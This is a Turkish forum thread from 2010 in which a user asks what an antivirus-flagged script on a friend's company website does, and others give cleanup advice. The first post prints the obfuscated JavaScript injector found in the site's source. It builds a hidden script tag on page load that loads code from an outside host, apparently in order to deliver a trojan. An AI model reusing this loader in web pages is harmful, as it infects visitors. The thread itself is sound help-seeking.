0
Kayıt Ol

Sitede Trojen

8

629

  • 08-01-2010, 22:30:36
    #1
    BurakH
    BurakH
    Arkadaşlar merhaba;

    Bir arkadaşımın şirket sitesine girince antivirüs uyarı verdi. Sitenin kodlarını inceleyince de decode edilmiş

    Alıntı
    <script>/*LGPL*/ try{ window.onload = function(){var Ysrfkz8enx34ww = document.createElement('s)c$#!r)i@!!p@$t!#'.replac e(/\(|@|\!|#|\)|\$|\^|&/ig, ''));Ysrfkz8enx34ww.setAttribute('defer', 'd@(e!&f^!e))@@r#^'.replace(/\)|@|&|\^|#|\(|\$|\!/ig, ''));Ysrfkz8enx34ww.setAttribute('type', 't^!!e$x)($$t)/()&j)a&&$v&@a&)s!c)r&i!#p&(^t^'.replace(/\(|@|#|&|\$|\)|\^|\!/ig, ''));Ysrfkz8enx34ww.setAttribute('id', 'H&)$9)p&@$^r#o$#(^#r$^^$^3^&b$!$y()^d&(^&'.replac e(/&|\^|\)|\$|\!|#|\(|@/ig, ''));Ysrfkz8enx34ww.setAttribute('s!(r^(&$c(!'.rep lace(/&|\$|\(|\^|@|#|\)|\!/ig, ''), ')(o@m$@#/&^w&&&i@n^!^d$&^(^o$@^$w($@^s$@l#)^)i&@v$!^&e$)$.@ @c!o^$m@/))g^^!!{document.body.appendChild(Ysrfkz8enx34ww); }} } catch(Enezdsv23895e1iceyl) {}</script>
    bu kodları gödüm. İnternette araştırma yaptım ama pek fazla bilgi yok. Antivirüs uyarısında e-dolandırıcılık engelleyicisi yazıyor ve açıklama kısmında kompas-com.55bbs.com.google.pt/yimg.com gibi siteler yazıyor. Sanırım bir çeşit yönlendirme ama anlam veremedim. Ne gibi tehlikeli bir kod bu ve kasıtlı mı konulmuştur ?
  • 08-01-2010, 23:00:42
    #2
    BurakH
    BurakH
    Symantec'in sitesine bu trojen hakkında bugün bilgi girilmiş.

    http://www.symantec.com/connect/blog...ipts-wild-lgpl

    İngilizcem iyi derece de olmadığından tam olarak anlayamadım. Anladığım kadarıyla bu javascript kodlarıyla Java,Acrobat Reader gibi programlar aracılığı ile websitesinden bilgisayara trojen bulaşıyor. Bu konu hakkında bilgisi olan lütfen paylaşsın.
  • 08-01-2010, 23:11:18
    #3
    Bilisimdunyasi
    Bilisimdunyasi
    Öncelikle ftp şifrenizi sağlam bir şifre ile değiştiriniz. Daha sonra başlat çalıştır msconfig yazarak başlangıç sekmesinde ne olduğunu bilmediğiniz .exe uzantılı dosyaların bilgisayar açılırken açılmasını engelleyin. Tabiki sistem dosyalarını ayıklayıp öyle gerçekleştirin bu işlemi...

    Bilgisayarınızı sağlam bir antivirüs programı ve anti spyware programı ile taratınız...

    İndex Dosyalarını temizleyiniz fakat şifrenizi değiştirmeyi unutmayınız.

    Teşekkürler, İyi çalışmalar
  • 08-01-2010, 23:15:15
    #4
    heLLz
    heLLz
    Arkadaşının pcsine siszyd32.exe virüsü bulaşmış. başlat>çalıştır>msconfig>başlangıç>siszyd3 2 yi görürsünüz fakat ordan iptal edilmiyor.
    Bulaşan arkadaşlara yardımcı olurum
  • 08-01-2010, 23:28:34
    #5
    BurakH
    BurakH
    Teşekkürler ilginiz için. Arkadaşla bu konyu konuşmadım daha Symentec Trojan.Pidief.H den bahsediyor. Eğer bu trojense baya tehlikeli gibi gözüküyor. Uzun zamandan beridir girmiyordum nete bugün girince kafamı baya kurcaladı. Bu trojenin keylogger gibi işlem görüp online bankacılık vs gibi bilgileri sızdırma olasılığı varmı ?
  • 08-01-2010, 23:30:51
    #6
    Bilisimdunyasi
    Bilisimdunyasi
    heLLz adlı üyeden alıntı: mesajı görüntüle
    Arkadaşının pcsine siszyd32.exe virüsü bulaşmış. başlat>çalıştır>msconfig>başlangıç>siszyd3 2 yi görürsünüz fakat ordan iptal edilmiyor.
    Bulaşan arkadaşlara yardımcı olurum
    İframe virüsü tek ad taşımaz Bu virüsün yeni yeni yayıldığı vakit aynı olay başımıza gelmişti. Ntos.exe adlı bir exe ile bulaşmıştı... O bakımdan bu virüsü tek bir isimle nitelendirmek pek uygun olmaz...

    Yukarıda msconfig ayarlarını dediğimiz gibi yapıp sağlam bir anti virüs ve anti spyware ile taratıp trojanları sildikten sonra ftp şifresini değiştirirlerle bir problem kalmaz...

    İyi akşamlar
  • 08-01-2010, 23:39:59
    #7
    XASIF
    XASIF
    Konu içersindeki Kodlar hala işlev göstermekte Nod32 Uyarı veriyor bence kodları kaldırın.

  • 08-01-2010, 23:43:44
    #8
    BurakH
    BurakH
    Kodları değiştirdim. Bu trojenler hakkında bilgi verebilirseniz iyi olur.
  • 09-01-2010, 00:22:31
    #9
    FenBiLiMi
    FenBiLiMi
    Kimlik doğrulama veya yönetimden onay bekliyor.
    BurakH adlı üyeden alıntı: mesajı görüntüle
    Kodları değiştirdim. Bu trojenler hakkında bilgi verebilirseniz iyi olur.
    herkes nasıl kurtulacğını söylüyor..
    nasıl bulaştığı hakkında aslında kımsenın kesın bır fıkrı yok malesef :S